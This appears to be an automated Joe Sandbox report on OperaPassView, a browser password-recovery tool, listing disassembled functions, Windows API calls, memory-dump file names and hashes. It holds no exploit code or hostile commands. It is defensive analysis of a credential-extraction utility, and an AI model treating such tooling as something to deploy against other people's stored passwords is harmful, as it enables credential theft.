                                        Function 00404FA0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00404FC5
                                        • GetPrivateProfileStringW.KERNEL32(00410D78,?,0040C3F0,?,00001000,00410B68), ref: 00404FED
                                        • WritePrivateProfileStringW.KERNEL32(00410D78,?,?,00410B68), ref: 0040500F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString$Writememset
                                        • String ID: xA
                                        • API String ID: 747731527-299298737
                                        • Opcode ID: 3fab942bb674a0dd551379886f7cd08537350ec84625e90ae14467a426e746b7
                                        • Instruction ID: b3f257a075a3dd523be960fda3401aaaa782971525adb0e2f35dd5816bada188
                                        • Opcode Fuzzy Hash: 3fab942bb674a0dd551379886f7cd08537350ec84625e90ae14467a426e746b7
                                        • Instruction Fuzzy Hash: 45F0AF31940318FAEB205B51DC4DFCB3768EB84718F004172BB08B11C2D7B89A80CAAD
                                        Function 0040103E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403D15: memset.MSVCRT ref: 00403D1F
                                          • Part of subcall function 00403D15: wcscpy.MSVCRT ref: 00403D5F
                                        • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040107C
                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 0040109A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                        • String ID: MS Sans Serif
                                        • API String ID: 210187428-168460110
                                        • Opcode ID: c084c5277869a5d151a46929ddb1d12913e68e5f073360a59db045cc3f1f3578
                                        • Instruction ID: 79044cec659ce028f5ed2952e81c049cea9264cb083b404993247dfa8a44912f
                                        • Opcode Fuzzy Hash: c084c5277869a5d151a46929ddb1d12913e68e5f073360a59db045cc3f1f3578
                                        • Instruction Fuzzy Hash: 5EF0E270A40304B7E6216BA0DC86F8A7BBDAB40B00F104139B741BA0E0D6F46192CA58
                                        Function 00403E3B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ClassName_wcsicmpmemset
                                        • String ID: edit
                                        • API String ID: 2747424523-2167791130
                                        • Opcode ID: e777c84daaff5312312b745305a767abe020e08bc75556860ee29f48c933b5b3
                                        • Instruction ID: 96ca970e5ce760780859b3d1d5f0b7c20d996f0d6dc3506b7cd15fc6093d8675
                                        • Opcode Fuzzy Hash: e777c84daaff5312312b745305a767abe020e08bc75556860ee29f48c933b5b3
                                        • Instruction Fuzzy Hash: 63E0D8B2D9030DAAFB10EBA0DC8AFA537ACEB00704F0001B6F515F10C2EB74A6494A88
                                        Function 0040AAB1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(shell32.dll,0040AAEF,?), ref: 0040AABF
                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AAD4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                        • API String ID: 2574300362-880857682
                                        • Opcode ID: 593d17e9276b56e7568bc76f33da6cac7503a89dddf6390720df0987fcdb757b
                                        • Instruction ID: a9c077829c63e3427da9d6ea6305b1b6c562c19f7a7418d7c59ad09ea6bb4f60
                                        • Opcode Fuzzy Hash: 593d17e9276b56e7568bc76f33da6cac7503a89dddf6390720df0987fcdb757b
                                        • Instruction Fuzzy Hash: E2D0C774610304EFD7009F669D497567994A708715F109437E756F12F8D7784810DF1D
                                        Function 0040905E Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$memcpy
                                        • String ID:
                                        • API String ID: 368790112-0
                                        • Opcode ID: 3b72156044261ea129f8cd4c3b105914ef94e7cbe1efc6e781f6e5ba62a6bea3
                                        • Instruction ID: 21c00b5734eb3d567cf088a0365e344c4847e95ec70e366810ec0c01c0267a0d
                                        • Opcode Fuzzy Hash: 3b72156044261ea129f8cd4c3b105914ef94e7cbe1efc6e781f6e5ba62a6bea3
                                        • Instruction Fuzzy Hash: 9001FCB1A50B046BD235AA35CC03F1A73A4EF91724F000B2EF15276AC2D7BCA50891DD
                                        Function 004074AA Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405BD5: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00405BF7
                                          • Part of subcall function 00405BD5: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C8C
                                        • wcslen.MSVCRT ref: 004074D8
                                        • _wtoi.MSVCRT(?), ref: 004074E4
                                        • _wcsicmp.MSVCRT ref: 00407532
                                        • _wcsicmp.MSVCRT ref: 00407543
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                        • String ID:
                                        • API String ID: 1549203181-0
                                        • Opcode ID: 6828c864208fbb81d1753add5a6d0da93504c5913cdcde66002761eda46f4ff5
                                        • Instruction ID: cf844fb8323e12a02f27c7c02474ad0a1c2ebbee51d9f020252b4c614b42a62b
                                        • Opcode Fuzzy Hash: 6828c864208fbb81d1753add5a6d0da93504c5913cdcde66002761eda46f4ff5
                                        • Instruction Fuzzy Hash: 68416D31904605BFCB20DF69C984A9EBBF0FB48319F10847EE955E37A1E738B9508B45
                                        Function 00406271 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                        • free.MSVCRT ref: 004062CA
                                        • memcpy.MSVCRT(00000000,?,?,g"@,?,?,?,?,?,00402267), ref: 004062DC
                                        • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,00402267), ref: 0040630F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpy$free
                                        • String ID: g"@
                                        • API String ID: 2888793982-1672938247
                                        • Opcode ID: d0368e864a8ee8171a8213670f6b6c2321b61b6c5172591d21014e3f04fea0c9
                                        • Instruction ID: 847f1e285f704c4283300a2ceb5e062fed8206f8320e772a557491d1eabc8965
                                        • Opcode Fuzzy Hash: d0368e864a8ee8171a8213670f6b6c2321b61b6c5172591d21014e3f04fea0c9
                                        • Instruction Fuzzy Hash: CF21A130900604EFCB20EF69CA4181ABBF5FF843147204A7EE856E7791E735EE119B58
                                        Function 0040218E Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _wcsicmpmemcpymemsetwcscmp
                                        • String ID:
                                        • API String ID: 2457885024-0
                                        • Opcode ID: 29b7007dc27532f12ac5d86aa4f19c13ccb3944361463df0eaac2def0b3d2e6a
                                        • Instruction ID: 9e2dca859bd8e337fc0f0d7f4250584473b8221a81ad69390a77a03363fec707
                                        • Opcode Fuzzy Hash: 29b7007dc27532f12ac5d86aa4f19c13ccb3944361463df0eaac2def0b3d2e6a
                                        • Instruction Fuzzy Hash: 0F11AB73448345AAD720DB91D445ACB73DCEB94314F10C93FF548E21C1EB78D25A8B9A
                                        Function 004047EF Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,0040138B,?,?,?,?,0040E9E0,0000000C), ref: 00404824
                                        • memset.MSVCRT ref: 00404835
                                        • memcpy.MSVCRT(00410280,?,00000000,00000000,00000000,00000000,00000000,?,?,0040138B,?,?,?,?,0040E9E0,0000000C), ref: 00404841
                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040484E
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID:
                                        • API String ID: 1865533344-0
                                        • Opcode ID: e25d2549f6dab1a7562d81ffe65a948629634f0979137ff2180887f085573f83
                                        • Instruction ID: 7f3cbbeba0b97abfd5b2ef5626cf5e3f75e87b7b74b1eee1a654a7845a9fc56c
                                        • Opcode Fuzzy Hash: e25d2549f6dab1a7562d81ffe65a948629634f0979137ff2180887f085573f83
                                        • Instruction Fuzzy Hash: DC116DB62146019FD328DF2DC881A26F7E5EFD8300B20CD2EE59A97381D735E801CB64
                                        Function 0040A406 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040A432
                                          • Part of subcall function 004042BC: _snwprintf.MSVCRT ref: 00404301
                                          • Part of subcall function 004042BC: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 00404311
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040A45B
                                        • memset.MSVCRT ref: 0040A465
                                        • GetPrivateProfileStringW.KERNEL32(?,?,0040C3F0,?,00002000,?), ref: 0040A487
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                        • String ID:
                                        • API String ID: 1127616056-0
                                        • Opcode ID: 22f5d59bff97f869856556b5e760ba140d4e58d9a9b7cfbb3677f7c58657b990
                                        • Instruction ID: 94bb197b7141ad7f05964ad995fa54540d22cb66ee77c7832990cf404167c01c
                                        • Opcode Fuzzy Hash: 22f5d59bff97f869856556b5e760ba140d4e58d9a9b7cfbb3677f7c58657b990
                                        • Instruction Fuzzy Hash: 1711CEB2900119AFDF115F60EC06E9E7BB8EF04710F10017AFF04B20A0E6319A60DBAD
                                        Function 00407769 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004049DF: GetModuleHandleW.KERNEL32(00000000,00000400,?,004020A6,OperaPassView), ref: 00404A1E
                                          • Part of subcall function 004049DF: LoadStringW.USER32(00000000,00000006,?,00000400), ref: 00404AB7
                                          • Part of subcall function 004049DF: memcpy.MSVCRT(00000000,00000002,?,004020A6,OperaPassView), ref: 00404AF7
                                        • _snwprintf.MSVCRT ref: 00407796
                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 004077FB
                                          • Part of subcall function 004049DF: wcscpy.MSVCRT ref: 00404A60
                                          • Part of subcall function 004049DF: wcslen.MSVCRT ref: 00404A7E
                                          • Part of subcall function 004049DF: GetModuleHandleW.KERNEL32(00000000,?,?,004020A6,OperaPassView), ref: 00404A8C
                                        • _snwprintf.MSVCRT ref: 004077C1
                                        • wcscat.MSVCRT ref: 004077D4
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                        • String ID:
                                        • API String ID: 822687973-0
                                        • Opcode ID: 0552a4ee1fe7cae6563512a282f531b3918f3ba0caa6d02f987acbc20cf991f4
                                        • Instruction ID: 597e801b89bc4fa3654148d7d39f706251bc5a95df630e696ebe74f71ef7d3bb
                                        • Opcode Fuzzy Hash: 0552a4ee1fe7cae6563512a282f531b3918f3ba0caa6d02f987acbc20cf991f4
                                        • Instruction Fuzzy Hash: C6014DB15007046AE720F775CD8AF6B73ACDB40704F04047BB719F61C2D639A9554AAD
                                        Function 00401E31 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00401E56
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00401E73
                                        • strlen.MSVCRT ref: 00401E85
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00401E96
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: adc9852e0b1febc2202ee91c46c3e0fdf9a531db0be14c9f292d03bd11a29de5
                                        • Instruction ID: 16c8af1d8422c26c0dc26ccbde34051a2b18808995f593d78c619f526c527117
                                        • Opcode Fuzzy Hash: adc9852e0b1febc2202ee91c46c3e0fdf9a531db0be14c9f292d03bd11a29de5
                                        • Instruction Fuzzy Hash: 0DF0F9B780122CBEFB05ABD49DC9DEB77ACDB04254F0001B6B719E2092D6749E44CBA9
                                        Function 004063AF Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004063D4
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,0040C4E0,?,?,?,?,?,00401FB3), ref: 004063ED
                                        • strlen.MSVCRT ref: 004063FF
                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00401FB3,?,?,00000008), ref: 00406410
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: aab097502b450ab04fa7522ad9fc48b90506c3085b37c64dbdaf70874a839c0e
                                        • Instruction ID: f9e3ec41d8263a0523f7ad29eccb5a434dbb2240c91e9d3185599c2a803b3e99
                                        • Opcode Fuzzy Hash: aab097502b450ab04fa7522ad9fc48b90506c3085b37c64dbdaf70874a839c0e
                                        • Instruction Fuzzy Hash: 8EF0F9B780122CBEEB059BD49DC9DEB77ACDB04254F0001B6B719E2092D6749E44CBA8
                                        Function 0040A343 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403E3B: memset.MSVCRT ref: 00403E5A
                                          • Part of subcall function 00403E3B: GetClassNameW.USER32(?,00000000,000000FF), ref: 00403E71
                                          • Part of subcall function 00403E3B: _wcsicmp.MSVCRT ref: 00403E83
                                        • SetBkMode.GDI32(?,00000001), ref: 0040A36A
                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 0040A378
                                        • SetTextColor.GDI32(?,00C00000), ref: 0040A386
                                        • GetStockObject.GDI32(00000000), ref: 0040A38E
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                        • String ID:
                                        • API String ID: 764393265-0
                                        • Opcode ID: 9b09ad20a0337de2b5b2026425044bdcc862375dc844c465ffe9bb5204cebf88
                                        • Instruction ID: 12fbb9296936337d5408b8751e97f1491dd38fe545a7ce3da3f523143f25607f
                                        • Opcode Fuzzy Hash: 9b09ad20a0337de2b5b2026425044bdcc862375dc844c465ffe9bb5204cebf88
                                        • Instruction Fuzzy Hash: B8F04F3110021AFFCF112FA5DD0AA9E3F25AF04725F10823AF919B55F1CB799960EA49
                                        Function 00409AFA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(00410598,?,00000050,?,004013CF,?), ref: 00409B14
                                        • memcpy.MSVCRT(004102C8,?,000002CC,00410598,?,00000050,?,004013CF,?), ref: 00409B26
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00409B39
                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_00009810,00000000), ref: 00409B4D
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpy$DialogHandleModuleParam
                                        • String ID:
                                        • API String ID: 1386444988-0
                                        • Opcode ID: 0ad54631e455bc40c9bc3f9a8f680d40ba5a2de016384f6f8a677ee17f95a5d3
                                        • Instruction ID: c0de872c080c53e53b11d38064c8daf66136313e004b0b3f38d9abbee202b5ff
                                        • Opcode Fuzzy Hash: 0ad54631e455bc40c9bc3f9a8f680d40ba5a2de016384f6f8a677ee17f95a5d3
                                        • Instruction Fuzzy Hash: DFF08276690720FBD7616BA4AC0AB967A50E745B15F10C57AF301B61E1C3F508919FCC
                                        Function 0040BA82 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: 65f5870ce9b62acd6e5566cf8349cdebd7e237696bb969b904447126deb3198b
                                        • Instruction ID: e62393db456745206b1eac394a25b361b16cb1bc4ee48270208fb90aee829c93
                                        • Opcode Fuzzy Hash: 65f5870ce9b62acd6e5566cf8349cdebd7e237696bb969b904447126deb3198b
                                        • Instruction Fuzzy Hash: 66E01A607003012ADA10AB7EB980B42239CDA84740318C83FB608E76E2EB3CC84099BC
                                        Function 0040845B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0040848C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
